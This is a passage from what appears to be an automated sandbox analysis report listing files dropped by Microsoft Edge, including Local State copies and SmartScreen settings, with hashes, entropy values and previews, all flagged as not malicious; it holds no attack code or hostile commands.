                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43a85.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43ad3.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43c59.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4630c.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4aaa4.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                    MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                    SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                    SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                    SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                    MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                    SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                    SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                    SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                    MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                    SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                    SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                    SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):81
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                    MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                    SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                    SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                    SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):130439
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                    MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                    SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                    SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                    SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                    MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                    SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                    SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                    SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):57
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                    MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                    SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                    SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                    SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.030394788231021
